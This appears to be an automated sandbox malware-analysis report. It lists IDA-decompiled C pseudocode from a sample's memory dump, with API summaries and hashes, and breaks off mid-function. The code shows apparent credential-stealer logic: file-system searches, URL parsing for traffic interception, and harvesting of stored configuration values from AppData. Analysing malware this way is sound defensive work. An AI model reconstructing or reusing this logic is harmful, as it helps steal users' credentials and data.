            0x0040921d
            0x00409222
            0x00409227
            0x00409229
            0x00000000
            0x00000000
            0x00409240
            0x00409245
            0x00409249
            0x0040924c
            0x00409429
            0x0040942d
            0x00000000
            0x0040942d
            0x0040925f
            0x00409267
            0x0040926f
            0x00409270
            0x0040927b
            0x0040927c
            0x00409287
            0x00409288
            0x00409293
            0x00409294
            0x00409299
            0x0040929d
            0x00409413
            0x00409417
            0x00409424
            0x00000000
            0x00409424
            0x004092a3
            0x004092a7
            0x004092ab
            0x004092b7
            0x004092bf
            0x004092c2
            0x004092c4
            0x004092c7
            0x00000000
            0x00000000
            0x004092d6
            0x004092e8
            0x004092f8
            0x00409308
            0x0040930a
            0x0040930f
            0x00409311
            0x00000000
            0x00000000
            0x00409317
            0x0040931c
            0x00000000
            0x00000000
            0x00409322
            0x00409324
            0x00000000
            0x00000000
            0x0040932a
            0x00409333
            0x00409338
            0x0040933b
            0x0040933f
            0x00409348
            0x0040934f
            0x00409354
            0x00409356
            0x00409380
            0x00409382
            0x00409383
            0x00409387
            0x0040938a
            0x00000000
            0x00000000
            0x00409390
            0x00409393
            0x00000000
            0x00000000
            0x00409395
            0x00409397
            0x00409399
            0x00000000
            0x00000000
            0x0040939b
            0x0040939d
            0x004093a3
            0x004093a3
            0x004093a7
            0x00000000
            0x00000000
            0x004093a9
            0x004093a9
            0x004093ab
            0x004093ad
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004093af
            0x004093af
            0x004093af
            0x004093b3
            0x004093b4
            0x004093b4
            0x004093ba
            0x004093bc
            0x004093c0
            0x004093c4
            0x004093c5
            0x004093ca
            0x004093cb
            0x004093cf
            0x004093d3
            0x004093d9
            0x004093e3
            0x004093e8
            0x004093eb
            0x004093ed
            0x004093ef
            0x004093f5
            0x004093fa
            0x004093fc
            0x004093fe
            0x004093fe
            0x004093fe
            0x004093fe
            0x004093fc
            0x004093ed
            0x00000000
            0x004093bc
            0x0040939f
            0x004093a1
            0x00000000
            0x00000000
            0x00000000
            0x004093a1
            0x00409358
            0x0040935d
            0x00409361
            0x00409371
            0x00409373
            0x00409376
            0x00000000
            0x00000000
            0x00409378
            0x0040937e
            0x00000000
            0x00000000
            0x00000000
            0x00409401
            0x00409401
            0x00409409
            0x00409409
            0x004092b7
            0x00000000
            0x004091db
            0x004091dd
            0x004091e1
            0x004091e2
            0x004091e9
            0x00409209
            0x00000000
            0x00409209

            APIs
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • HeapAlloc.KERNEL32(00000008,00000626,?,00000001,00000000,?,?), ref: 0040925F
            • StrStrIA.SHLWAPI(?,?), ref: 004092D4
            • StrStrIA.SHLWAPI(?,?), ref: 004092E6
            • StrStrIA.SHLWAPI(?,?), ref: 004092F6
            • StrStrIA.SHLWAPI(?,?), ref: 00409308
              • Part of subcall function 00415BE8: FindFirstFileW.KERNEL32(?,?,?,?,00000000,00000000,00000104), ref: 00415C27
              • Part of subcall function 00415BE8: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00415C4E
              • Part of subcall function 00415BE8: PathMatchSpecW.SHLWAPI(?,?), ref: 00415C99
              • Part of subcall function 00415BE8: Sleep.KERNEL32(00000000,?,?), ref: 00415CF6
              • Part of subcall function 00415BE8: FindNextFileW.KERNEL32(?,?), ref: 00415D24
              • Part of subcall function 00415BE8: FindClose.KERNEL32(?), ref: 00415D36
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
            • String ID:
            • API String ID: 1635188419-0
            • Opcode ID: 98ecc4d0ab032505792b92bf9f4530215f7d651f82a1e8f9d0d3b23ffc75dddd
            • Instruction ID: 26de7116fe1e3e149dccd2365830bd4b657dd8cfac2353edbbc91d90cfd6093a
            • Opcode Fuzzy Hash: 98ecc4d0ab032505792b92bf9f4530215f7d651f82a1e8f9d0d3b23ffc75dddd
            • Instruction Fuzzy Hash: 5571AF31508350AFD721DF24C845A9BB7E5AFC8718F00092EF994A72D2D779DD4ACB8A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00406ECA Relevance: 6.3, APIs: 4, Instructions: 343networkCOMMON
            Download Yara Rule
            C-Code - Quality: 90%
            			E00406ECA(void* __edx, intOrPtr _a4) {
				char _v9;
				signed int _v16;
				char _v17;
				char _v24;
				void* _v32;
				char _v36;
				char _v60;
				char _v72;
				intOrPtr _v76;
				char* _v80;
				void* _v96;
				intOrPtr _v144;
				void* _v156;
				char _v248;
				char _v512;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t108;
				void* _t113;
				void* _t117;
				void* _t120;
				void* _t128;
				void* _t130;
				char* _t133;
				char _t138;
				void* _t142;
				void* _t145;
				void* _t146;
				void* _t149;
				intOrPtr _t153;
				intOrPtr _t154;
				intOrPtr* _t156;
				intOrPtr _t160;
				void* _t163;
				void* _t164;
				void* _t165;
				int _t170;
				void* _t173;
				char _t176;
				void* _t180;
				signed int _t183;
				void* _t188;
				signed int _t190;
				char* _t191;
				intOrPtr _t192;
				char* _t194;
				void* _t195;
				char* _t200;
				char* _t201;
				intOrPtr _t203;
				intOrPtr* _t204;
				intOrPtr _t205;
				char* _t208;
				void* _t209;
				void* _t212;

				_t195 = __edx;
				_t183 = 0;
				_v16 = 0;
				_v9 = 0xff;
				EnterCriticalSection(0x41a9bc);
				_t189 =  *0x41a9d8; // 0x0
				if(_t189 == 0) {
					L8:
					_t205 = _a4;
					L9:
					LeaveCriticalSection(0x41a9bc);
					_t108 =  *((intOrPtr*)(_t205 + 0x30));
					_t216 = _t108 - _t183;
					if(_t108 == _t183) {
						L33:
						if((_v16 & 0x00000001) == 0) {
							_t154 =  *((intOrPtr*)(_t205 + 0x34));
							_t234 = _t154 - _t183;
							if(_t154 != _t183 && E004068DC(_t189, _t195, _t234, 3, _t154,  *(_t205 + 4),  *(_t205 + 8)) != 0) {
								_v16 = _v16 | 0x00000001;
							}
						}
						_v17 = 0;
						if( *((intOrPtr*)(_t205 + 0x1c)) >= 0x21) {
							_t149 = 0xd;
							E0040F333(_t149,  &_v72);
							_t203 =  *((intOrPtr*)(_t205 + 0x18));
							if(E00410489( &_v72, _t203, 0x21) == 0) {
								_t153 =  *((intOrPtr*)(_t203 + 0x21));
								if(_t153 == 0x3b || _t153 == 0) {
									_v17 = 1;
								}
							}
						}
						_t190 = 8;
						if(_v9 != 0xff) {
							__eflags = _v9 - 1;
							if(_v9 != 1) {
								goto L52;
							}
							goto L51;
						} else {
							if( *((char*)(_t205 + 0x14)) != 1 ||  *((intOrPtr*)(_t205 + 0x24)) <= _t183) {
								L52:
								if((_v16 & _t190) == 0) {
									L82:
									if((_v16 & 0x00000001) == 0) {
										if(E00406940(_t195, _t205) != 0) {
											_v16 = _v16 | 0x00000002;
										}
										if(_v17 != 0 && E00406CD5(_t195, _t205) != 0) {
											_v16 = _v16 | 0x00000004;
										}
									}
									return _v16;
								}
								_t112 =  *((intOrPtr*)(_t205 + 0x24));
								_v9 = 0;
								if( *((intOrPtr*)(_t205 + 0x24)) != _t183) {
									__eflags = _v17;
									if(_v17 == 0) {
										__eflags =  *((intOrPtr*)(_t205 + 0x1c)) - _t183;
										if( *((intOrPtr*)(_t205 + 0x1c)) != _t183) {
											_t113 = 9;
											E0040F333(_t113,  &_v60);
											_t117 = E00411233( &_v32,  &_v60,  *((intOrPtr*)(_t205 + 0x18)));
											_t209 = _t209 + 0xc;
											__eflags = _t117 - 1;
											if(_t117 >= 1) {
												_t183 = _v32;
											}
											L69:
											if(_t183 == 0) {
												L81:
												_v16 = _v16 & 0xfffffff7;
												goto L82;
											}
											E0040BB16( &_v24);
											_t120 = E0041065D( *(_t205 + 8), 0,  *(_t205 + 4));
											_t199 = _t120;
											if(_t120 != 0) {
												_t195 = 0x3c;
												E004104CB( &_v156,  &_v156, 0, _t195);
												_v156 = _t195;
												if(InternetCrackUrlA( *(_t205 + 4),  *(_t205 + 8), 0,  &_v156) == 1) {
													_t128 = 6;
													E0040F369(_t128,  &_v248);
													_t130 = 0xa;
													E0040F369(_t130,  &_v60);
													_t208 = _v24;
													_t191 = 0x401ff4;
													if(_t208 == 0) {
														_t208 = 0x401ff4;
													}
													_t133 =  *(_a4 + 0xc);
													if(_t133 == 0) {
														_t133 = "-";
													}
													if((_v16 & 0x00000001) != 0) {
														_t191 =  &_v60;
													}
													_push(_t183);
													_push(_t208);
													_push(_t133);
													_push(_t191);
													_t138 = E0040D965(_t191, _t195, (0 | _v144 == 0x00000004) + 0xb, (0 | _v144 == 0x00000004) + 0xb, _t199, 0,  &_v248, _t199);
													_t205 = _a4;
													_v9 = _t138;
												}
												E00410418(_t199);
											}
											E00410418(_v24);
											E00410418(_t183);
											if(_v9 != 0) {
												goto L82;
											} else {
												goto L81;
											}
										}
										_t200 =  &_v36;
										E0040F333(_t190, _t200);
										_push(_t200);
										_push(9);
										L66:
										_pop(_t142);
										_t183 = E00410882(_t142);
										goto L69;
									}
									_t183 = E00410882(_t112,  *((intOrPtr*)(_t205 + 0x20)));
									_t145 = 0;
									__eflags = _t183;
									if(_t183 == 0) {
										goto L81;
									}
									__eflags =  *((intOrPtr*)(_t205 + 0x24));
									if( *((intOrPtr*)(_t205 + 0x24)) <= 0) {
										goto L69;
									} else {
										goto L58;
									}
									do {
										L58:
										_t192 =  *((intOrPtr*)(_t145 + _t183));
										__eflags = _t192 - 0x26;
										if(_t192 != 0x26) {
											__eflags = _t192 - 0x2b;
											if(_t192 == 0x2b) {
												 *((char*)(_t145 + _t183)) = 0x20;
											}
										} else {
											 *((char*)(_t145 + _t183)) = 0xa;
										}
										_t145 = _t145 + 1;
										__eflags = _t145 -  *((intOrPtr*)(_t205 + 0x24));
									} while (_t145 <  *((intOrPtr*)(_t205 + 0x24)));
									goto L69;
								}
								_t201 =  &_v36;
								_t146 = 7;
								E0040F333(_t146, _t201);
								_push(_t201);
								_push(7);
								goto L66;
							} else {
								L51:
								_v16 = _v16 | _t190;
								goto L52;
							}
						}
					}
					_t156 = E00416037( &_v24, _t195, _t216, _t108, 0x4e25, 0x10000000);
					_t189 = _v24;
					_t204 = _t156;
					_v32 = _t204;
					if(E004112FD(_t156, _v24) == 0) {
						L32:
						E00410418(_v32);
						_t183 = 0;
						goto L33;
					} else {
						goto L11;
					}
					do {
						L11:
						_t14 = _t204 + 1; // 0x1
						_t194 = _t14;
						if( *_t194 == 0) {
							goto L31;
						}
						_t160 =  *_t204;
						if(_t160 == 0x21) {
							L21:
							_t204 = _t194;
							L22:
							_t189 = _t204;
							if(E00406638(_t204,  *(_t205 + 4),  *(_t205 + 8)) == 0) {
								goto L31;
							}
							_t163 = _t188;
							if(_t163 == 0) {
								L29:
								_v9 = 1;
								L30:
								if(_t188 != 2) {
									goto L32;
								}
								goto L31;
							}
							_t164 = _t163 - 1;
							if(_t164 == 0) {
								_v9 = 0;
								goto L30;
							}
							_t165 = _t164 - 1;
							if(_t165 == 0) {
								_t195 = 0x3c;
								E004104CB( &_v96,  &_v96, 0, _t195);
								_v80 =  &_v512;
								_v96 = _t195;
								_v76 = 0x103;
								_t170 = InternetCrackUrlA( *(_t205 + 4),  *(_t205 + 8), 0,  &_v96);
								__eflags = _t170 - 1;
								if(_t170 == 1) {
									__eflags = _v76;
									if(_v76 > 0) {
										E0040BAD0( &_v512);
									}
								}
								goto L30;
							}
							_t173 = _t165 - 1;
							if(_t173 == 0 || _t173 == 1) {
								_v16 = _v16 | 0x00000001;
								goto L29;
							} else {
								goto L30;
							}
						}
						if(_t160 == 0x2d) {
							goto L21;
						}
						if(_t160 == 0x40) {
							goto L21;
						}
						if(_t160 == 0x5e) {
							_t188 = 4;
							goto L21;
						} else {
							_t188 = 0;
							goto L22;
						}
						L31:
						_t189 = _t204;
						_t204 = E0041133B(_t204, 1);
					} while (_t204 != 0);
					goto L32;
				}
				_t212 =  *0x41a9d4 - _t183; // 0x0
				if(_t212 == 0) {
					goto L8;
				} else {
					_t205 = _a4;
					if(E00406638(_t189,  *(_t205 + 4),  *(_t205 + 8)) != 0) {
						_t176 = E00405FD1();
						_v24 = _t176;
						if(_t176 != 0) {
							_t180 = E004066FA(_t195, 4,  &_v24,  *0x41a9d4);
							_push(_v24);
							if(_t180 == 0) {
								E00410418();
							}
							E0040603C(_t189);
						}
						E00410418( *0x41a9d4);
						E00410418( *0x41a9d8);
						 *0x41a9d4 = _t183;
						 *0x41a9d8 = _t183;
					}
					goto L9;
				}
			}



























































            0x00406eca
            0x00406edb
            0x00406ede
            0x00406ee1
            0x00406ee5
            0x00406eeb
            0x00406ef3
            0x00406f62
            0x00406f62
            0x00406f65
            0x00406f66
            0x00406f6c
            0x00406f6f
            0x00406f71
            0x0040701c
            0x00407020
            0x00407022
            0x00407025
            0x00407027
            0x0040703b
            0x0040703b
            0x00407027
            0x00407043
            0x00407047
            0x0040704e
            0x0040704f
            0x00407054
            0x00407065
            0x00407067
            0x0040706c
            0x00407072
            0x00407072
            0x0040706c
            0x00407065
            0x0040707c
            0x0040707d
            0x004070ed
            0x004070f1
            0x00000000
            0x00000000
            0x00000000
            0x0040707f
            0x00407083
            0x004070f6
            0x004070f9
            0x00407280
            0x00407284
            0x0040728e
            0x00407290
            0x00407290
            0x00407298
            0x004072a4
            0x004072a4
            0x00407298
            0x004072af
            0x004072af
            0x004070ff
            0x00407102
            0x00407108
            0x0040711c
            0x00407120
            0x0040715a
            0x0040715d
            0x0040717d
            0x0040717e
            0x0040718d
            0x00407192
            0x00407195
            0x00407198
            0x0040719a
            0x0040719a
            0x0040719d
            0x0040719f
            0x0040727c
            0x0040727c
            0x00000000
            0x0040727c
            0x004071a8
            0x004071b5
            0x004071ba
            0x004071be
            0x004071c6
            0x004071d1
            0x004071e2
            0x004071f4
            0x004071fe
            0x004071ff
            0x00407209
            0x0040720a
            0x0040720f
            0x00407212
            0x00407219
            0x0040721b
            0x0040721b
            0x00407220
            0x00407225
            0x00407227
            0x00407227
            0x00407230
            0x00407232
            0x00407232
            0x00407235
            0x00407236
            0x00407237
            0x00407238
            0x00407254
            0x00407259
            0x0040725f
            0x0040725f
            0x00407263
            0x00407263
            0x0040726b
            0x00407271
            0x0040727a
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0040727a
            0x0040715f
            0x00407164
            0x0040716b
            0x0040716c
            0x0040716e
            0x0040716e
            0x00407174
            0x00000000
            0x00407174
            0x0040712a
            0x0040712c
            0x0040712e
            0x00407130
            0x00000000
            0x00000000
            0x00407136
            0x00407139
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0040713b
            0x0040713b
            0x0040713b
            0x0040713e
            0x00407141
            0x00407149
            0x0040714c
            0x0040714e
            0x0040714e
            0x00407143
            0x00407143
            0x00407143
            0x00407152
            0x00407153
            0x00407153
            0x00000000
            0x00407158
            0x0040710c
            0x0040710f
            0x00407110
            0x00407117
            0x00407118
            0x00000000
            0x0040708a
            0x004070f3
            0x004070f3
            0x00000000
            0x004070f3
            0x00407083
            0x0040707d
            0x00406f85
            0x00406f8a
            0x00406f8d
            0x00406f8f
            0x00406f99
            0x00407012
            0x00407015
            0x0040701a
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00406f9b
            0x00406f9b
            0x00406f9b
            0x00406f9b
            0x00406fa1
            0x00000000
            0x00000000
            0x00406fa3
            0x00406fa7
            0x00406fc7
            0x00406fc7
            0x00406fc9
            0x00406fcc
            0x00406fd8
            0x00000000
            0x00000000
            0x00406fdd
            0x00406fe0
            0x00406ffa
            0x00406ffa
            0x00406ffe
            0x00407001
            0x00000000
            0x00000000
            0x00000000
            0x00407001
            0x00406fe2
            0x00406fe3
            0x004070e4
            0x00000000
            0x004070e4
            0x00406fe9
            0x00406fea
            0x0040708e
            0x00407096
            0x004070a1
            0x004070ad
            0x004070b3
            0x004070ba
            0x004070c0
            0x004070c3
            0x004070c9
            0x004070cd
            0x004070da
            0x004070da
            0x004070cd
            0x00000000
            0x004070c3
            0x00406ff0
            0x00406ff1
            0x00406ff6
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00406ff1
            0x00406fab
            0x00000000
            0x00406fc1
            0x00406faf
            0x00000000
            0x00406fbd
            0x00406fb3
            0x00406fb9
            0x00000000
            0x00406fb5
            0x00406fb5
            0x00000000
            0x00406fb5
            0x00407003
            0x00407005
            0x0040700c
            0x0040700e
            0x00000000
            0x00406f9b
            0x00406ef5
            0x00406efb
            0x00000000
            0x00406efd
            0x00406efd
            0x00406f0d
            0x00406f0f
            0x00406f14
            0x00406f19
            0x00406f27
            0x00406f2c
            0x00406f31
            0x00406f33
            0x00406f38
            0x00406f39
            0x00406f39
            0x00406f44
            0x00406f4f
            0x00406f54
            0x00406f5a
            0x00406f5a
            0x00000000
            0x00406f0d

            APIs
            • EnterCriticalSection.KERNEL32(0041A9BC), ref: 00406EE5
            • LeaveCriticalSection.KERNEL32(0041A9BC), ref: 00406F66
            • InternetCrackUrlA.WININET(?,?,00000000,?), ref: 004070BA
              • Part of subcall function 00405FD1: CreateMutexW.KERNEL32(0041A2C8,00000000,0041A870,0041A9BC,?,?,00406F14), ref: 00405FF9
              • Part of subcall function 00410418: HeapFree.KERNEL32(00000000,00000000,00411C0D,00000000,?,?,?,?,0040373A,00000000,00403AF4), ref: 0041042B
            • InternetCrackUrlA.WININET(?,?,00000000,?), ref: 004071EB
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CrackCriticalInternetSection$CreateEnterFreeHeapLeaveMutex
            • String ID:
            • API String ID: 4018265435-0
            • Opcode ID: dfc3f6939daf971f022ea04e6a520fe5a49b70be543f3356a493e96db219cd91
            • Instruction ID: 3cd55c20b642fc78b1d6b8e1fdfce49b821121673e8872ef817571e476f0ecf7
            • Opcode Fuzzy Hash: dfc3f6939daf971f022ea04e6a520fe5a49b70be543f3356a493e96db219cd91
            • Instruction Fuzzy Hash: 6CC1E030D04205AADF319BA1C941BEF7BA5AF04344F04847FE542BA2D2C77DA996CB5A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00408853 Relevance: 6.2, APIs: 4, Instructions: 236COMMON
            Download Yara Rule
            C-Code - Quality: 81%
            			E00408853(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				char _v524;
				char _v588;
				char _v620;
				char _v632;
				char _v636;
				intOrPtr* _v644;
				char _v656;
				char _v668;
				char _v672;
				char _v676;
				char _v680;
				intOrPtr* _v684;
				char _v688;
				char _v692;
				char _v700;
				char _v708;
				char _v712;
				char _v720;
				intOrPtr* _v724;
				signed int _v728;
				intOrPtr _v732;
				intOrPtr* _v736;
				intOrPtr* _v744;
				intOrPtr* _v748;
				char _v752;
				void* __esi;
				void* _t77;
				intOrPtr _t80;
				intOrPtr* _t83;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t87;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				intOrPtr* _t93;
				intOrPtr _t94;
				void* _t95;
				intOrPtr* _t97;
				intOrPtr _t98;
				void* _t99;
				intOrPtr* _t101;
				intOrPtr _t102;
				intOrPtr* _t103;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t107;
				intOrPtr* _t112;
				void* _t114;
				intOrPtr _t118;
				intOrPtr _t120;
				void* _t126;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t163;
				char* _t167;
				char* _t168;
				char* _t169;
				char* _t170;
				char* _t171;
				intOrPtr* _t172;
				intOrPtr _t174;
				char* _t179;
				signed int _t180;
				void* _t182;

				_t182 = (_t180 & 0xfffffff8) - 0x2a4;
				if(E00415D45( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L45:
					return 1;
				}
				_t185 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t133 = E0041699E( &_v524, __eflags,  &_v524);
					_t163 = 0;
					_v644 = _t133;
					__eflags = _t133;
					if(_t133 == 0) {
						goto L45;
					}
					_t167 =  &_v588;
					_t77 = 0x53;
					E0040F369(_t77, _t167);
					_t80 =  *((intOrPtr*)( *_t133 + 0x90))(_t133, _t167,  &_v672);
					__eflags = _t80;
					if(_t80 != 0) {
						L44:
						 *((intOrPtr*)( *_t133 + 8))(_t133);
						goto L45;
					}
					_t83 = _v684;
					_t84 =  *((intOrPtr*)( *_t83 + 0x24))(_t83,  &_v692);
					__eflags = _t84;
					if(_t84 != 0) {
						L43:
						_t85 = _v692;
						 *((intOrPtr*)( *_t85 + 8))(_t85);
						goto L44;
					} else {
						goto L6;
					}
					do {
						L6:
						_t168 =  &_v620;
						_t87 = 0x54;
						E0040F369(_t87, _t168);
						_t89 = _v700;
						_t141 =  *_t89;
						_t90 =  *((intOrPtr*)( *_t89 + 0x94))(_t89, _t168,  &_v668);
						__eflags = _t90;
						if(_t90 != 0) {
							_v700 = _t163;
						} else {
							_v700 = E00416A20(_t141,  &_v680);
						}
						_t169 =  &_v656;
						_t91 = 0x55;
						E0040F369(_t91, _t169);
						_t93 = _v712;
						_t142 =  *_t93;
						_t94 =  *((intOrPtr*)( *_t93 + 0x94))(_t93, _t169,  &_v676);
						__eflags = _t94;
						if(_t94 != 0) {
							_v708 = _t163;
						} else {
							_v708 = E00416A20(_t142,  &_v688);
						}
						_t170 =  &_v656;
						_t95 = 0x56;
						E0040F369(_t95, _t170);
						_t97 = _v724;
						_t143 =  *_t97;
						_t98 =  *((intOrPtr*)( *_t97 + 0x94))(_t97, _t170,  &_v700);
						__eflags = _t98;
						if(_t98 != 0) {
							_v732 = _t163;
						} else {
							_v732 = E00416A20(_t143,  &_v712);
						}
						_t171 =  &_v692;
						_t99 = 0x57;
						E0040F369(_t99, _t171);
						_t101 = _v736;
						_t144 =  *_t101;
						_t102 =  *((intOrPtr*)( *_t101 + 0x94))(_t101, _t171,  &_v708);
						__eflags = _t102;
						if(_t102 != 0) {
							_t134 = 0;
							__eflags = 0;
						} else {
							_t134 = E00416A20(_t144,  &_v720);
						}
						_t103 = _v736;
						__eflags = _t103 - _t163;
						if(_t103 == _t163) {
							_t172 = __imp__#6;
						} else {
							__eflags =  *_t103 - _t163;
							if( *_t103 == _t163) {
								L33:
								_t172 = __imp__#6;
								 *_t172(_v736);
								goto L35;
							}
							_t112 = _v744;
							__eflags = _t112 - _t163;
							if(_t112 == _t163) {
								goto L33;
							}
							__eflags =  *_t112 - _t163;
							if( *_t112 == _t163) {
								goto L33;
							}
							__eflags = _t134 - _t163;
							if(_t134 == _t163) {
								goto L33;
							}
							__eflags =  *_t134 - _t163;
							if( *_t134 == _t163) {
								goto L33;
							}
							_t113 = _v732;
							__eflags = _v732 - _t163;
							if(_v732 != _t163) {
								_t163 = E00410B54(_t113);
							}
							__eflags = _t163 - 1;
							if(_t163 < 1) {
								L28:
								_t163 = 0x15;
								goto L29;
							} else {
								__eflags = _t163 - 0xffff;
								if(_t163 <= 0xffff) {
									L29:
									_v728 = _v728 & 0x00000000;
									_t114 = 0x2c;
									E0040F369(_t114,  &_v632);
									_push(_t163);
									_push(_v736);
									_push(_t134);
									_t118 = E00411220( &_v728,  &_v632, _v744);
									_t182 = _t182 + 0x18;
									__eflags = _t118;
									if(_t118 > 0) {
										_t174 = _a4;
										_t120 = E00410818(_t118, _t174, _v728);
										__eflags = _t120;
										if(_t120 != 0) {
											_t55 = _t174 + 4;
											 *_t55 =  *((intOrPtr*)(_t174 + 4)) + 1;
											__eflags =  *_t55;
										}
									}
									E00410418(_v728);
									_t163 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L28;
							}
						}
						L35:
						__eflags = _v732 - _t163;
						if(_v732 != _t163) {
							 *_t172(_v732);
						}
						__eflags = _v744 - _t163;
						if(_v744 != _t163) {
							 *_t172(_v744);
						}
						__eflags = _t134 - _t163;
						if(_t134 != _t163) {
							 *_t172(_t134);
						}
						_t104 = _v748;
						 *((intOrPtr*)( *_t104 + 8))(_t104);
						_t106 = _v744;
						_t107 =  *((intOrPtr*)( *_t106 + 0x24))(_t106,  &_v752);
						__eflags = _t107;
					} while (_t107 == 0);
					_t133 = _v720;
					goto L43;
				}
				_t179 =  &_v636;
				_t126 = 0x52;
				E0040F369(_t126, _t179);
				_v672 = _t179;
				E00415BE8( &_v524,  &_v672, _t185, 1, 5, E00408853, _a4, 0, 0, 0);
				goto L45;
			}




































































            0x00408859
            0x00408877
            0x00408af3
            0x00408afb
            0x00408afb
            0x0040887d
            0x00408880
            0x004088c7
            0x004088c9
            0x004088cb
            0x004088cf
            0x004088d1
            0x00000000
            0x00000000
            0x004088d9
            0x004088dd
            0x004088de
            0x004088ee
            0x004088f4
            0x004088f6
            0x00408aed
            0x00408af0
            0x00000000
            0x00408af0
            0x004088fc
            0x00408908
            0x0040890b
            0x0040890d
            0x00408ae3
            0x00408ae3
            0x00408aea
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00408913
            0x00408913
            0x00408915
            0x00408919
            0x0040891a
            0x0040891f
            0x00408923
            0x0040892e
            0x00408934
            0x00408936
            0x00408947
            0x00408938
            0x00408941
            0x00408941
            0x0040894d
            0x00408951
            0x00408952
            0x00408957
            0x0040895b
            0x00408966
            0x0040896c
            0x0040896e
            0x0040897f
            0x00408970
            0x00408979
            0x00408979
            0x00408985
            0x00408989
            0x0040898a
            0x0040898f
            0x00408993
            0x0040899e
            0x004089a4
            0x004089a6
            0x004089b7
            0x004089a8
            0x004089b1
            0x004089b1
            0x004089bd
            0x004089c1
            0x004089c2
            0x004089c7
            0x004089cb
            0x004089d6
            0x004089dc
            0x004089de
            0x004089ed
            0x004089ed
            0x004089e0
            0x004089e9
            0x004089e9
            0x004089ef
            0x004089f3
            0x004089f5
            0x00408a99
            0x004089fb
            0x004089fb
            0x004089fe
            0x00408a8b
            0x00408a8f
            0x00408a95
            0x00000000
            0x00408a95
            0x00408a04
            0x00408a08
            0x00408a0a
            0x00000000
            0x00000000
            0x00408a0c
            0x00408a0f
            0x00000000
            0x00000000
            0x00408a11
            0x00408a13
            0x00000000
            0x00000000
            0x00408a15
            0x00408a18
            0x00000000
            0x00000000
            0x00408a1a
            0x00408a1e
            0x00408a20
            0x00408a27
            0x00408a27
            0x00408a29
            0x00408a2c
            0x00408a36
            0x00408a38
            0x00000000
            0x00408a2e
            0x00408a2e
            0x00408a34
            0x00408a39
            0x00408a39
            0x00408a47
            0x00408a48
            0x00408a4d
            0x00408a4e
            0x00408a54
            0x00408a5f
            0x00408a64
            0x00408a67
            0x00408a69
            0x00408a6b
            0x00408a74
            0x00408a79
            0x00408a7b
            0x00408a7d
            0x00408a7d
            0x00408a7d
            0x00408a7d
            0x00408a7b
            0x00408a84
            0x00408a89
            0x00408a89
            0x00000000
            0x00408a89
            0x00000000
            0x00408a34
            0x00408a2c
            0x00408a9f
            0x00408a9f
            0x00408aa3
            0x00408aa9
            0x00408aa9
            0x00408aab
            0x00408aaf
            0x00408ab5
            0x00408ab5
            0x00408ab7
            0x00408ab9
            0x00408abc
            0x00408abc
            0x00408abe
            0x00408ac5
            0x00408ac8
            0x00408ad4
            0x00408ad7
            0x00408ad7
            0x00408adf
            0x00000000
            0x00408adf
            0x00408884
            0x00408888
            0x00408889
            0x00408890
            0x004088b0
            0x00000000

            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
            • String ID:
            • API String ID: 1075381090-0
            • Opcode ID: 537f3c1781016d8ad11d0c6d2a435427c902f41f1b82dda8680f7b0b0fd45726
            • Instruction ID: ed69c49dea863cd64fe349b8d465aa9b01a56cac77a617e2b5305d48863adfa0
            • Opcode Fuzzy Hash: 537f3c1781016d8ad11d0c6d2a435427c902f41f1b82dda8680f7b0b0fd45726
            • Instruction Fuzzy Hash: 9881AD71604301AFCB10EF61C944A6BB7E9EFC8714F04892FF885A7291DB78D906CB96
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040A447 Relevance: 6.1, APIs: 4, Instructions: 130COMMON
            Download Yara Rule
            C-Code - Quality: 83%
            			E0040A447(void* __eflags, intOrPtr _a4) {
				signed int _v5;
				short _v20;
				char _v40;
				char _v60;
				short _v84;
				char _v112;
				char _v144;
				short _v664;
				char _v1184;
				short _v1704;
				char _v2224;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t31;
				long _t33;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				long _t50;
				short* _t58;
				char* _t66;
				short _t67;
				void* _t68;
				WCHAR* _t71;
				long _t78;

				_t31 = 0xe;
				E0040F369(_t31,  &_v144);
				_t33 =  &_v1184;
				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t33);
				if(_t33 == 0) {
